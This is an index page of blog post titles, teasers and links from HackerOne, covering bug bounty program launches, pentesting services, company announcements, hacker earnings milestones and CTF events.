HackerOne Rolls Out Pentest Review System for Customers and Pentesters

https://www.hackerone.com/penetration-testing/hackerone-rolls-out-pentest-review-system-customers-and-pentesters

Are Election Hacking Fears Driving Voters To The Polls?
If people fear that the American electoral infrastructure could be hacked, will they withhold their votes in November? Not according to research commissioned by HackerOne.
https://www.hackerone.com/company-news/are-election-hacking-fears-driving-voters-polls

Become a HackerOne Brand Ambassador
Announcing the Hacker Brand Ambassador Program: lead hackers in your city, get exclusive perks, further your career.
https://www.hackerone.com/company-news/become-hackerone-brand-ambassador

National University of Singapore Taps Students to Hack for Good
In an inaugural InterUni Bug Bounty Challenge jointly organized by the National University of Singapore (NUS) and Singapore Management University (SMU) from 12 August to 9 September 2020, students and staff from the two universities will get to hone their hacking skills by looking for vulnerabilities (or 'bugs') across the digital assets of their respective universities in exchange for monetary rewards, or bounties. To kick off the InterUni Bug Bounty Challenge, we sat down with NUS Chief Information Technology Officer Tommy Hor to learn more about the Challenge, why cybersecurity is so important to educational institutions like NUS, and more.
https://www.hackerone.com/ethical-hacker/national-university-singapore-taps-students-hack-good

Recap of h@cktivitycon 2020
HackerOne's first-ever hacker conference, h@cktivitycon, streamed on Twitch from Friday, July 31st to August 1st, 2020; this blog post recaps it.
https://www.hackerone.com/ethical-hacker/recap-hcktivitycon-2020

Adobe and HackerOne Celebrate Five Years of Continued Collaboration
To celebrate five years with HackerOne, we sat down with Adobe's Senior Security Program Manager Pieter Ockers to discuss how their program has evolved over the last five years and the role that hacker-powered security, both bug bounties and response programs, plays in their overall security strategy.
https://www.hackerone.com/company-news/adobe-and-hackerone-celebrate-five-years-continued-collaboration

COVID Confessions of a CISO
The COVID-19 crisis has shifted life online. As companies rush to meet remote work requirements and customer demands for digital services, attack surfaces have dramatically expanded, leaving security teams stretched thin and not staffed to cope. HackerOne dug into this concept to identify COVID-19 impacts on security and business. Read on for our findings.
https://www.hackerone.com/company-news/covid-confessions-ciso

Human vs. Machine: Three-Part Virtual Series on the Human Element of AppSec

https://www.hackerone.com/ethical-hacker/human-vs-machine-three-part-virtual-series-human-element-appsec

Securing video streaming in sub-Saharan Africa
Maintaining a video streaming service across the whole of Africa is challenge enough, without the added pressure of potential security issues. Showmax turns to hackers to secure their customer data and protect the security of their shows and movies.
https://www.hackerone.com/application-security/securing-video-streaming-sub-saharan-africa

Security@ 2020 Call for Speakers is Open
HackerOne's global hacker-powered security conference, Security@, is back for its fourth year. This year's virtual event will take place October 20-22, 2020. The call for speakers is now open! You have until August 21, 2020, to submit your talk.
https://www.hackerone.com/company-news/security-2020-call-speakers-open

Costa Coffee prepares for global expansion with bug bounty program
As the coffee chain prepares for global expansion, Costa Coffee joins the likes of Hyatt, Deliveroo, and Zomato in launching its first private bug bounty program. Costa Coffee will shore up its digital defenses using the combined expertise and experience of HackerOne's hacker community.
https://www.hackerone.com/application-security/costa-coffee-prepares-global-expansion-bug-bounty-program

A Warm Welcome To Our New SVP of Customer Success
We are delighted to announce that Amanda Berger — former Chief Customer Officer at Lucidworks — has joined HackerOne as our new SVP of Customer Success. In this article, Amanda introduces herself and shares what she hopes to achieve at HackerOne.
https://www.hackerone.com/company-news/warm-welcome-our-new-svp-customer-success

Pentesting basics video series launched on Hacker101
Learn the basics of pentesting to further your career and develop core competencies required in one of the hottest job markets in cybersecurity: Penetration testing.
https://www.hackerone.com/ethical-hacker/pentesting-basics-video-series-launched-hacker101

Cybersecurity Vendor Consolidation: Securing More with Less
Discover how hacker-powered security solutions can help identify the gaps and consolidate point-solution tools into a single platform for easier management and measured ROI.
https://www.hackerone.com/company-news/cybersecurity-vendor-consolidation-securing-more-less

Visma's Ioana Piroska on Securing the Development Lifecycle Through Bug Bounties
Having recently taken their bug bounty program public, we caught up with Visma Security Analyst Ioana Piroska about the program's results so far and Visma's plans for the future.
https://www.hackerone.com/application-security/vismas-ioana-piroska-securing-development-lifecycle-through-bug-bounties

Pentesting Beyond Compliance: A Tool to Improve Your Security Posture

https://www.hackerone.com/penetration-testing/pentesting-beyond-compliance-tool-improve-your-security-posture

What Juneteenth Means at HackerOne

https://www.hackerone.com/company-news/what-juneteenth-means-hackerone

Reputation, Signal & Impact Calculation Enhancements
Reputation, Signal and Impact changes and how this will affect hacker stats going forward.
https://www.hackerone.com/ethical-hacker/reputation-signal-impact-calculation-enhancements

Mail.ru Group pays out over $1 million in bounties

https://www.hackerone.com/ethical-hacker/mailru-group-pays-out-over-1-million-bounties

Mayonaise Joins The Ranks of The Seven-Figure-Earning Hackers
Congratulations to @mayonaise, the ninth hacker to earn $1 Million hacking for good on the HackerOne platform! Read on for more about his unique approach, focus, and journey to being one of the top hackers in the world.
https://www.hackerone.com/ethical-hacker/mayonaise-joins-ranks-seven-figure-earning-hackers

Celebrating Pride at HackerOne

https://www.hackerone.com/company-news/celebrating-pride-hackerone

What to Look For in a Penetration Testing Company
Penetration testing is one of the most widely used techniques to comply with security regulations and protect network and computing systems and users. Hacker-powered penetration tests are emerging as a more cost-effective way to harden applications. With HackerOne Challenge, selected hackers from our community are invited to find vulnerabilities in your systems, and you only pay for the verified vulnerabilities found.
https://www.hackerone.com/vulnerability-management/what-look-penetration-testing-company

Announcing the PlayStation Bug Bounty Program
Today, PlayStation launched a public bug bounty program on HackerOne because the security of their products is a fundamental part of creating amazing experiences for the PlayStation community. Read on to learn more about their program, bounties, and more.
https://www.hackerone.com/application-security/announcing-playstation-bug-bounty-program

Juneteenth: HackerOne's Day for Action

https://www.hackerone.com/company-news/juneteenth-hackerones-day-action

Scaling & Prioritizing Product Security with Zendesk
In a recent virtual roundtable, we sat down with Scott Reed, Senior Manager of Product Security at Zendesk, to discuss how they incorporate bug bounties throughout their product security strategy and scaling security at a high-growth organization. Take a look at some of the highlights of our conversation below.
https://www.hackerone.com/application-security/scaling-prioritizing-product-security-zendesk

How does Pentesting fit into your overall security strategy?
As digital technologies and data transform the way business gets done, a cybersecurity strategy is fundamental in helping your company save time and money while protecting your brand. How should organizations think about penetration testing within their overall security strategy?
https://www.hackerone.com/penetration-testing/how-does-pentesting-fit-your-overall-security-strategy

h1-2006 CTF
h1-2006 CTF Winner Announcement
https://www.hackerone.com/ethical-hacker/h1-2006-ctf

Crowdsourcing Racial Justice and Equality

https://www.hackerone.com/company-news/crowdsourcing-racial-justice-and-equality

There is no room for racism or inequality here.
At HackerOne we say No to racism. We are here to democratize opportunity across the world. We believe in the aspirations and possibilities of every human being. Hacker-powered security is proof that by working together across all boundaries we accomplish what otherwise would remain unachievable.
https://www.hackerone.com/ceo/there-no-room-racism-or-inequality-here

100 Hacking Tools and Resources
As part of our $100 Million in bounties celebration, we want to share a list of 100 tools and resources that will help hackers continue hacking!
https://www.hackerone.com/ethical-hacker/100-hacking-tools-and-resources

The Journey in Data: HackerOne Hits 100 Million Dollars in Bounties
Yesterday, hackers on HackerOne hit a major milestone: they have earned a total of $100 million in bounties over the past 8 years, with nearly half in the past year alone! Let's take a look at some of the numbers that have taken us to the $100 million milestone.
https://www.hackerone.com/ethical-hacker/journey-data-hackerone-hits-100-million-dollars-bounties

$100 Million Paid - One Billion in Sight for Hackers
Today we celebrate with all our hackers the phenomenal milestone of a hundred million dollars in bounties. Hack for Good! Yet we should know that we are only getting going. The digital world is not safe and secure yet. Much more work awaits us. We have one hundred million more bugs to find.
https://www.hackerone.com/ceo/100-million-paid-one-billion-sight-hackers

Thanks For Being Part Of The Journey to $100 Million in Bounties!
Reaching $100 Million in bounties is a reason to celebrate what this community has achieved. It also gave us a chance to reflect on the journey to this point and the enduring values that will get us to the next milestone.
https://www.hackerone.com/ethical-hacker/thanks-being-part-journey-100-million-bounties

10 Ways to Hack Your “New Normal” Workweek
As a company inspired by hackers, HackerOne is taking this unique time to hack our programs to provide our people with additional support to ensure the wellbeing of all Hackeronies and their families. Here's a peek at the fun programs and perks we've implemented at HackerOne based on input from our people.
https://www.hackerone.com/company-news/10-ways-hack-your-new-normal-workweek

How Federal Agencies Use Vulnerability Disclosure Policies to Level Up Security

https://www.hackerone.com/vulnerability-management/how-federal-agencies-use-vulnerability-disclosure-policies-level-security

Security by the People: Announcing HackerOne's FedRAMP Authorization
Since 2016, we've been proud to help secure critical U.S. Department of Defense and GSA applications. As we achieve FedRAMP Tailored Authorization, we are excited to expand this important work.
https://www.hackerone.com/vulnerability-management/security-people-announcing-hackerones-fedramp-authorization

Stay Ahead of Threats With Hacker-Powered Retesting
Introducing Hacker-Powered Retesting! Retesting is designed to scale with capabilities to keep your critical assets safe from increasingly sophisticated attacks.
https://www.hackerone.com/vulnerability-management/stay-ahead-threats-hacker-powered-retesting

PayPal on Creating Strong Relationships with Security Researchers

https://www.hackerone.com/application-security/paypal-creating-strong-relationships-security-researchers

Hackers take on San Francisco for the 4th Year in a Row
HackerOne hosted its first flagship event of the year with Verizon Media in San Francisco.
https://www.hackerone.com/ethical-hacker/hackers-take-san-francisco-4th-year-row

Shopify Celebrates 5 Years on HackerOne

https://www.hackerone.com/vulnerability-management/shopify-celebrates-5-years-hackerone

Hackweek: An insider's look at HackerOne culture

https://www.hackerone.com/ethical-hacker/hackweek-insiders-look-hackerone-culture

Slack Increases Bounty Minimums For the Next 90 Days

https://www.hackerone.com/application-security/slack-increases-bounty-minimums-next-90-days

Live Hacking Goes Virtual

https://www.hackerone.com/ethical-hacker/live-hacking-goes-virtual

Hack for Good: Easily Donate Bounties to WHO's COVID-19 Response Fund
Collaboration and bounty splitting have been possible for years, and now you can easily donate bounties by adding the user “hackforgood” as a collaborator to a report submission on HackerOne.
https://www.hackerone.com/ethical-hacker/hack-good-easily-donate-bounties-whos-covid-19-response-fund

Six years of the GitHub Security Bug Bounty program

https://www.hackerone.com/application-security/six-years-github-security-bug-bounty-program

Live hacking the U.S. Air Force, UK Ministry of Defence and Verizon Media in Los Angeles at h1-213
HackerOne hosted its final flagship live hacking event of 2019 in Los Angeles, CA
https://www.hackerone.com/ethical-hacker/live-hacking-us-air-force-uk-ministry-defence-and-verizon-media-los-angeles-h1-213

My Career Just Got Hacked: Rana Robillard Joins HackerOne

https://www.hackerone.com/my-career-just-got-hacked-rana-robillard-joins-hackerone

Live Hacking Events | 2019 Recap and the Road Ahead
A look at where we've been and where we're going in 2020...
https://www.hackerone.com/ethical-hacker/live-hacking-events-2019-recap-and-road-ahead

Confessions of European CISOs
Ever wondered what's been keeping your CISO up at night? Well, wonder no more. We did some research to find out what worries European CISOs who are tasked with shoring up their digital infrastructure.
https://www.hackerone.com/company-news/confessions-european-cisos

LINE Security Bug Bounty Program Report 2019

https://www.hackerone.com/application-security/line-security-bug-bounty-program-report-2019

Congratulations, Cosmin! The world's seventh million-dollar bug bounty hacker
The ranks of seven-figure-earning hackers have now risen to eight. Meet @inhibitor181 — the world's seventh million-dollar bug bounty hacker.
https://www.hackerone.com/ethical-hacker/congratulations-cosmin-worlds-seventh-million-dollar-bug-bounty-hacker

Dropbox bug bounty program has paid out over $1,000,000

https://www.hackerone.com/ethical-hacker/dropbox-bug-bounty-program-has-paid-out-over-1000000

Hyatt Celebrates its First Anniversary on HackerOne

https://www.hackerone.com/vulnerability-management/hyatt-celebrates-its-first-anniversary-hackerone

#AndroidHackingMonth: Introduction to Android Hacking by @0xteknogeek

https://www.hackerone.com/ethical-hacker/androidhackingmonth-intro-to-android-hacking

Guess what's coming!? #AndroidHackingMonth on @Hacker0x01
February is Android Hacking Month! That means new resources, new CTFs, and, of course, swag. Learn more about how to get involved.
https://www.hackerone.com/ethical-hacker/AndroidHackingMonth

h1-415 CTF Winners Announced!
Thanks to all who participated in our #h1415 CTF, and congratulations to our winners @p4fg and @manoelt! Here's how it went down.
https://www.hackerone.com/ethical-hacker/h1-415-ctf-winners-announced

InnoGames Models Avatar After Top Ethical Hacker
Kevin Heseler, Security Engineer at InnoGames, tells us how InnoGames leverages their bug bounty program to secure their games, and about the unique approach they have taken to awarding their most valuable hacker with their very own avatar in the 'Forge of Empires' game.
https://www.hackerone.com/ethical-hacker/innogames-models-avatar-after-top-ethical-hacker

Why Every Federal Agency Needs a VDP

https://www.hackerone.com/vulnerability-management/why-every-federal-agency-needs-vdp

GitLab Celebrates Awarding $1 Million in Bounties to Hackers on HackerOne
Today, GitLab announced that they have awarded $1 million in bounties to hackers on HackerOne. To learn more about the open-source tool's security strategy and commitment to transparency, we sat down with security managers James Ritchey and Ethan Strike. Read on for a glimpse into our conversation.
https://www.hackerone.com/vulnerability-management/gitlab-celebrates-awarding-1-million-bounties-hackers-hackerone

HackerOne Launches Bug Bounty Program for Kubernetes
The Cloud Native Computing Foundation (CNCF) today launched the Kubernetes bug bounty program on HackerOne. The Kubernetes bug bounty program is yet another layer of security assurance that will reward researchers who find vulnerabilities in the container orchestration system. Bounties will range from $100 to $10,000. All reports will be thoroughly investigated by the Kubernetes Product Security Committee, a set of security-minded Kubernetes community volunteers.
https://www.hackerone.com/application-security/hackerone-launches-bug-bounty-program-kubernetes

Hacking for Good

https://www.hackerone.com/ceo/hacking-good

This Season, Give the Gift of Data-Driven Insight

https://www.hackerone.com/company-news/season-give-gift-data-driven-insight

Using Bug Bounty Talent Pools to Attract and Maintain Top Talent

https://www.hackerone.com/vulnerability-management/using-bug-bounty-talent-pools-attract-and-maintain-top-talent

Transparency Builds Trust
Someone called it a “breach,” and the world took notice. Here is the story.
https://www.hackerone.com/vulnerability-management/transparency-builds-trust

How Bug Bounties Help You Shift Left

https://www.hackerone.com/application-security/how-bug-bounties-help-you-shift-left

HackerOne is a 2019 Cyber Catalyst Designated Cybersecurity Solution

https://www.hackerone.com/application-security/hackerone-2019-cyber-catalyst-designated-cybersecurity-solution

8 High-impact Bugs and How HackerOne Customers Avoided a Breach: SQL Injection

https://www.hackerone.com/security-compliance/8-high-impact-bugs-and-how-hackerone-customers-avoided-breach-sql-injection

How the Risk-Averse DoD Learned to Stop Worrying and Love the Hackers

https://www.hackerone.com/vulnerability-management/how-risk-averse-dod-learned-stop-worrying-and-love-hackers

The World's Elite Hackers Share Tips and Insights

https://www.hackerone.com/ethical-hacker/worlds-elite-hackers-share-tips-and-insights

LINE Launches Public Bug Bounty Program: Q&A with Security Engineer Robin Lunde
Today, after three successful years running an independent bug bounty program, LINE launched a public bug bounty program on HackerOne. To learn more about the popular messaging app's security strategy and commitment to the hacker community, we sat down with security engineers Robin Lunde, Koh You Liang and Keitaro Yamazaki. Read on for a glimpse into our conversation.
https://www.hackerone.com/application-security/line-launches-public-bug-bounty-program-qa-security-engineer-robin-lunde

Supporting the Source: Why HackerOne is Upgrading its Free Tools for Open Source
Open source software powers HackerOne. As part of our mission to make the internet safer, we want to make it easier for your open source project to remain secure, so we're joining GitHub Security Lab. Read on for more on why we're joining, new free offerings for open source projects from HackerOne, and new open source targets for hackers from GitHub and HackerOne.
https://www.hackerone.com/vulnerability-management/supporting-source-why-hackerone-upgrading-its-free-tools-open-source

Announcing Program Audit Log
As our customers' security teams grow, it's important for us to sustain their growth with new features. Today we're announcing the Program Audit Log. It enables customers to audit important actions that were taken in their program, such as permission updates, new members, bounty rewards, and program settings. Read on for more!
https://www.hackerone.com/vulnerability-management/announcing-program-audit-log

Reducing Risk With a Bug Bounty Program

https://www.hackerone.com/application-security/reducing-risk-bug-bounty-program